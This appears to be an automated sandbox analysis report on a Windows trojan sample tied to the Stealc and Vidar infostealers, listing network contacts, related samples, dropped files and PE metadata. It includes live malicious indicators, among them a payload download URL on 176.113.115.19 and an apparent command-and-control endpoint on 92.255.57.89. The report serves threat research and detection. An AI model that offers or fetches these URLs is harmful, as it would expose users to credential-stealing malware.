                                        http://176.113.115.19/ScreenUpdateSync.exeSEejSLAS9f.exe, SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmp, SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000970000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://post-to-me.com/track_prt.php?sub=0&cc=DEISEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        172.67.179.207
                                        post-to-me.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        92.255.57.89
                                        unknownRussian Federation
                                        42253TELSPRUtrue
                                        176.113.115.19
                                        unknownRussian Federation
                                        49505SELECTELRUfalse
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1572886
                                        Start date and time:2024-12-11 06:56:06 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 23s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:9
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:SEejSLAS9f.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:f538d845b52f9d902ee451636d79df4d.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@4/7@1/3
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 92%
                                        • Number of executed functions: 57
                                        • Number of non-executed functions: 324
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 20.189.173.20, 4.245.163.56, 20.190.147.10, 13.107.246.63
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        TimeTypeDescription
                                        00:57:00API Interceptor8905413x Sleep call for process: SEejSLAS9f.exe modified
                                        00:57:54API Interceptor1x Sleep call for process: WerFault.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        172.67.179.207EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                          ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                            6X4BIzTTBR.exeGet hashmaliciousStealcBrowse
                                              IeccNv7PP6.exeGet hashmaliciousStealc, VidarBrowse
                                                XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                                  0r9PL33C8E.exeGet hashmaliciousStealcBrowse
                                                    Pw2KHOL9Z8.exeGet hashmaliciousStealcBrowse
                                                      o3QbCA4xLs.exeGet hashmaliciousStealc, VidarBrowse
                                                        XhYAqi0wi5.exeGet hashmaliciousStealcBrowse
                                                          Uviv7rEtnt.exeGet hashmaliciousStealc, VidarBrowse
                                                            92.255.57.89mMgFHz9PdG.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89/45c616e921a794b8.php
                                                            vCZfRWB1kd.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89/45c616e921a794b8.php
                                                            1891f566c018182f1b5826b5fe2a05d6927aff15638d2.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89/45c616e921a794b8.php
                                                            EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89/45c616e921a794b8.php
                                                            L51yh4SC75.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89/45c616e921a794b8.php
                                                            84b4eda5d456a2c49d117a0b99bc2ed03044eaa144eb5.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89/45c616e921a794b8.php
                                                            ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89/
                                                            ief722WreR.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89/45c616e921a794b8.php
                                                            yZB8qfUJJu.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89/45c616e921a794b8.php
                                                            5gR5rEGCfw.exeGet hashmaliciousStealc, VidarBrowse
                                                            • 92.255.57.89/45c616e921a794b8.php
                                                            176.113.115.19EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                            ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                            ief722WreR.exeGet hashmaliciousStealcBrowse
                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                            7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                            • 176.113.115.19/ScreenUpdateSync.exe
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            post-to-me.comEbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                            • 172.67.179.207
                                                            ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                            • 172.67.179.207
                                                            ief722WreR.exeGet hashmaliciousStealcBrowse
                                                            • 104.21.56.70
                                                            7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                            • 104.21.56.70
                                                            YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                            • 104.21.56.70
                                                            6X4BIzTTBR.exeGet hashmaliciousStealcBrowse
                                                            • 172.67.179.207
                                                            vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                            • 104.21.56.70
                                                            IeccNv7PP6.exeGet hashmaliciousStealc, VidarBrowse
                                                            • 172.67.179.207
                                                            XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                                            • 172.67.179.207
                                                            0r9PL33C8E.exeGet hashmaliciousStealcBrowse
                                                            • 172.67.179.207
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUSCJE003889.exeGet hashmaliciousFormBookBrowse
                                                            • 172.67.158.81
                                                            https://hongkongliving.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                            • 104.18.33.8
                                                            Hays eft_Receipt number N302143235953.htmGet hashmaliciousUnknownBrowse
                                                            • 104.17.25.14
                                                            http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                            • 172.67.26.92
                                                            Mozi.m.elfGet hashmaliciousMiraiBrowse
                                                            • 172.71.119.218
                                                            EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                            • 172.67.179.207
                                                            EFT Remittance_(Deerequipment)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                            • 104.21.18.132
                                                            https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04Get hashmaliciousUnknownBrowse
                                                            • 104.16.117.116
                                                            https://on-chainevm.pages.devGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.16.79.73
                                                            https://vcsfi.kidsavancados.com/Get hashmaliciousCaptcha PhishBrowse
                                                            • 104.21.9.144
                                                            TELSPRUmMgFHz9PdG.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89
                                                            vCZfRWB1kd.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89
                                                            1891f566c018182f1b5826b5fe2a05d6927aff15638d2.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89
                                                            EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89
                                                            L51yh4SC75.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89
                                                            84b4eda5d456a2c49d117a0b99bc2ed03044eaa144eb5.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89
                                                            ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89
                                                            ief722WreR.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89
                                                            yZB8qfUJJu.exeGet hashmaliciousStealcBrowse
                                                            • 92.255.57.89
                                                            5gR5rEGCfw.exeGet hashmaliciousStealc, VidarBrowse
                                                            • 92.255.57.89
                                                            SELECTELRUEbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                            • 176.113.115.19
                                                            ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                            • 176.113.115.19
                                                            ief722WreR.exeGet hashmaliciousStealcBrowse
                                                            • 176.113.115.19
                                                            5gR5rEGCfw.exeGet hashmaliciousStealc, VidarBrowse
                                                            • 176.113.115.215
                                                            7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                            • 176.113.115.19
                                                            la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 45.89.231.211
                                                            5EZLEXDveC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                            • 176.113.115.163
                                                            teste.sh4.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                            • 45.138.214.123
                                                            xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                            • 176.124.33.0
                                                            YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                            • 176.113.115.37
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            37f463bf4616ecd445d4a1937da06e19http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                            • 172.67.179.207
                                                            EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                            • 172.67.179.207
                                                            Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                            • 172.67.179.207
                                                            ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                            • 172.67.179.207
                                                            ief722WreR.exeGet hashmaliciousStealcBrowse
                                                            • 172.67.179.207
                                                            REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                            • 172.67.179.207
                                                            Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                            • 172.67.179.207
                                                            ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 172.67.179.207
                                                            7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                            • 172.67.179.207
                                                            PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                            • 172.67.179.207
                                                            No context
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.9638393213416602
                                                            Encrypted:false
                                                            SSDEEP:192:IEHUQe0MDDPj/XZrP2izuiFSZ24IO8do:L7FMDDPjtFzuiFSY4IO8d
                                                            MD5:FC61ED4430BD97C6B5DA691EC78538B2
                                                            SHA1:05D4D5301863E219BDF58AA6C2E20520A02C952E
                                                            SHA-256:1E10682B0E35F64CADF5E74E57A73A0520E504F28F364A717D6F1377D51620F9
                                                            SHA-512:C42C2FA15B392F1E49CEA0F782925589DAA4031BECDA942101223A36EB8FFE14F27DDA2EC675D97F052C13FD27C6389D3D13E8180A51D90FC719554E0972827E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.7.0.2.5.3.4.1.9.8.8.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.7.0.2.5.4.5.2.9.2.6.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.d.2.8.0.5.6.-.b.3.a.7.-.4.1.2.9.-.a.3.0.3.-.e.0.e.c.d.3.3.3.c.b.8.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.e.a.2.6.a.6.-.1.4.6.a.-.4.8.2.b.-.a.5.1.9.-.c.0.8.0.0.2.4.c.c.d.5.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.D.7.1...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.b.4.-.0.0.0.1.-.0.0.1.4.-.c.1.9.c.-.4.d.8.0.9.1.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.4.6.0.f.8.d.3.a.6.8.0.1.5.f.2.7.9.2.c.6.6.9.6.b.2.6.6.7.8.d.2.0.0.0.0.1.5.0.6.!.0.0.0.0.6.d.b.3.a.6.b.2.2.e.4.5.2.f.f.6.b.a.5.5.b.b.2.8.d.7.8.d.c.a.1.e.a.0.f.d.e.a.6.a.!.1.D.7.1...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Wed Dec 11 05:57:33 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):62018
                                                            Entropy (8bit):1.816260131152295
                                                            Encrypted:false
                                                            SSDEEP:192:gzJhQi5XcbmO/X2OQOJwhxjCHyDEgB4nzrGGjkndccT7Fyghr7j6Oi0x:IQ/bmOZQEKuKHB4xily+uOpx
                                                            MD5:A55C35E30E11850AC3DF680209BB17BD
                                                            SHA1:2E48D8AA1C526DB22AD70019466697C8AE95C32B
                                                            SHA-256:909DA38B5E5FF49167B814EBE9B322A44AA1B09EB049C8B634EBF3A50922DD25
                                                            SHA-512:B342899A595CBA927DA81EAFAD60BB9E7D19B431F3393ED203560BD9F149103FB48A7E020A2E599F132C7FAC1CBB93C12AE0627FBCB0059C3E34B20BB9161393
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:MDMP..a..... ........)Yg............4...............<.......t....*..........T.......8...........T............3..B.......................................................................................................eJ......H.......GenuineIntel............T............)Yg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8322
                                                            Entropy (8bit):3.695316898615795
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJc06C6YT/6sgmfKJpDM89btOsfgPm:R6lXJ36C6Yr6sgmfKVtNfV
                                                            MD5:E2E8ED8B697994D07E870FBF3D6A5587
                                                            SHA1:77B4DBDE4FB8E0C3A3436BB10CC31CE3B3E2D15D
                                                            SHA-256:C4A4B14AE88CE0E255A08FDCACFBF7CEB2A042CBD4D2F1A3A5909DBF9D78D2D6
                                                            SHA-512:1C66131D5FECBB9CA48241238AC63B941B056041CD59899B66C6885D510C0B2FC9117089676F28E22604FEC2787CD8F7EF7A19468C651A0C824B6EBED6ED51A8
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.6.0.<./.P.i.
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4575
                                                            Entropy (8bit):4.44015329552771
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zscJg77aI95WWpW8VYEYm8M4JheFN+q8dIEHNezypd:uIjfaI7737VkJwTEEzypd
                                                            MD5:1D012A01D74E3177A6FAF45BC7E679E7
                                                            SHA1:E611FACE5BCA72D09BCA36E479B308E2A481DB9B
                                                            SHA-256:D764A30533B24237D2AA8AC2A9316C59BDCA40CE3565CE8E8F0387B40064DCC1
                                                            SHA-512:F18F740B949868271DC2F55A7638A84C5AE276F31ADFD71C4D5C1B5F111201AD6041517F2383E171A9979DF3E96EC0320AD3D485AF648C42945AED429CB50665
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="626220" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Users\user\Desktop\SEejSLAS9f.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):304128
                                                            Entropy (8bit):6.255602222353754
                                                            Encrypted:false
                                                            SSDEEP:3072:nkCrb2hNwf/fDwvofR3pQ0dZSzK3i1QPlvtfABAmffbj7AKzxSQ9Ra+pSzuZ:kCv2hNSf7ZzdZSG3i1KllImmff/txjo
                                                            MD5:9D773E345DCA0487C5654A92E6340BAA
                                                            SHA1:6DB3A6B22E452FF6BA55BB28D78DCA1EA0FDEA6A
                                                            SHA-256:176EE771C395DC6748A4C973A15D53A5D68B9704989349A862714E4BDC0F9FDA
                                                            SHA-512:A8D94374D51141FD9654E960E6B1F28FC10ACE788BEE77DB1EFE01AA1A3020CB7F53230238B832BE1EBADFA73076AC51157D1C18175ABEE0FE66566A3D6786AC
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*..*..*..xM..*..x\..*..xJ..*....*..*..*..xC..*..x]..*..xX..*.Rich.*.........................PE..L......d......................?...................@.......................... B.....~........................................'..d.....A.0...............................................................................l............................text............................... ..`.rdata..j ......."..................@..@.data....=..@...l..................@....rsrc...0.....A.....................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\SEejSLAS9f.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):304128
                                                            Entropy (8bit):6.255602222353754
                                                            Encrypted:false
                                                            SSDEEP:3072:nkCrb2hNwf/fDwvofR3pQ0dZSzK3i1QPlvtfABAmffbj7AKzxSQ9Ra+pSzuZ:kCv2hNSf7ZzdZSG3i1KllImmff/txjo
                                                            MD5:9D773E345DCA0487C5654A92E6340BAA
                                                            SHA1:6DB3A6B22E452FF6BA55BB28D78DCA1EA0FDEA6A
                                                            SHA-256:176EE771C395DC6748A4C973A15D53A5D68B9704989349A862714E4BDC0F9FDA
                                                            SHA-512:A8D94374D51141FD9654E960E6B1F28FC10ACE788BEE77DB1EFE01AA1A3020CB7F53230238B832BE1EBADFA73076AC51157D1C18175ABEE0FE66566A3D6786AC
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*..*..*..xM..*..x\..*..xJ..*....*..*..*..xC..*..x]..*..xX..*.Rich.*.........................PE..L......d......................?...................@.......................... B.....~........................................'..d.....A.0...............................................................................l............................text............................... ..`.rdata..j ......."..................@..@.data....=..@...l..................@....rsrc...0.....A.....................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:MS Windows registry file, NT/2000 or above
                                                            Category:dropped
                                                            Size (bytes):1835008
                                                            Entropy (8bit):4.465430379914935
                                                            Encrypted:false
                                                            SSDEEP:6144:YIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNedwBCswSb6:NXD94+WlLZMM6YFHA+6
                                                            MD5:723CACAE91A705807A19BB1384517D0F
                                                            SHA1:C8881F170A340BB1D6FD12FA175E90FC81835663
                                                            SHA-256:15D9498B56B5AE6CB7F29282F1527119A82B249C1F3ED934A7BC6C0E7DC8C2C9
                                                            SHA-512:AFD95C278AE6EEB08882BDF6E56E0CCAB77C65A31F8F1A1BF605C6DAA59E884C5C68B3F669BA4E2DCD9785311F54A0E279BF98280013ABE67AB5DAEF02758E8E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..<..K................................................................................................................................................................................................................................................................................................................................................+.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):6.969411140786927
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:SEejSLAS9f.exe
                                                            File size:428'544 bytes
                                                            MD5:f538d845b52f9d902ee451636d79df4d
                                                            SHA1:19b2b01778f50ce375ccfa4c33602b5c5665ccaf
                                                            SHA256:9a1c659df3f2a04d8982ea66ce8397736c98eda3059ceebc467033ac35e176ed
                                                            SHA512:8f92a6dfd5e0b7539dc37158a3bd96194ddb18ca6bd73d6ffdb7697bdb07344fe9057fc18b031dbb6a0b85480d630b49fe5ba2ff7cecd68bc129fbb79ceb25ec
                                                            SSDEEP:6144:qe7kGTJjzllLURC56vpVvdxsgUhQyljBT26mLzEF2bAfT80OYw:ttTRjEDvzsgsBBwfE0Ao0Ov
                                                            TLSH:5694DF1275E1842EEEF74B312975D6B0193BBC625B70809E3694329F1E732E18E21F97
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...xM..*...x\..*...xJ..*.......*...*...*...xC..*...x]..*...xX..*..Rich.*..........................PE..L......e...
                                                            Icon Hash:46c7c30b0f4e0d59
                                                            Entrypoint:0x4014f7
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x652EE37F [Tue Oct 17 19:41:51 2023 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:0
                                                            File Version Major:5
                                                            File Version Minor:0
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:0
                                                            Import Hash:65fde8098f3aba7bab4d6464cb5259fe
                                                            Instruction
                                                            call 00007F81C0EE5000h
                                                            jmp 00007F81C0EE24FDh
                                                            mov edi, edi
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 00000328h
                                                            mov dword ptr [00454878h], eax
                                                            mov dword ptr [00454874h], ecx
                                                            mov dword ptr [00454870h], edx
                                                            mov dword ptr [0045486Ch], ebx
                                                            mov dword ptr [00454868h], esi
                                                            mov dword ptr [00454864h], edi
                                                            mov word ptr [00454890h], ss
                                                            mov word ptr [00454884h], cs
                                                            mov word ptr [00454860h], ds
                                                            mov word ptr [0045485Ch], es
                                                            mov word ptr [00454858h], fs
                                                            mov word ptr [00454854h], gs
                                                            pushfd
                                                            pop dword ptr [00454888h]
                                                            mov eax, dword ptr [ebp+00h]
                                                            mov dword ptr [0045487Ch], eax
                                                            mov eax, dword ptr [ebp+04h]
                                                            mov dword ptr [00454880h], eax
                                                            lea eax, dword ptr [ebp+08h]
                                                            mov dword ptr [0045488Ch], eax
                                                            mov eax, dword ptr [ebp-00000320h]
                                                            mov dword ptr [004547C8h], 00010001h
                                                            mov eax, dword ptr [00454880h]
                                                            mov dword ptr [0045477Ch], eax
                                                            mov dword ptr [00454770h], C0000409h
                                                            mov dword ptr [00454774h], 00000001h
                                                            mov eax, dword ptr [00452004h]
                                                            mov dword ptr [ebp-00000328h], eax
                                                            mov eax, dword ptr [00452008h]
                                                            mov dword ptr [ebp-00000324h], eax
                                                            call dword ptr [000000C0h]
                                                            Programming Language:
                                                            • [C++] VS2008 build 21022
                                                            • [ASM] VS2008 build 21022
                                                            • [ C ] VS2008 build 21022
                                                            • [IMP] VS2005 build 50727
                                                            • [RES] VS2008 build 21022
                                                            • [LNK] VS2008 build 21022
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x507f40x64.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x42e0000x11d30.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
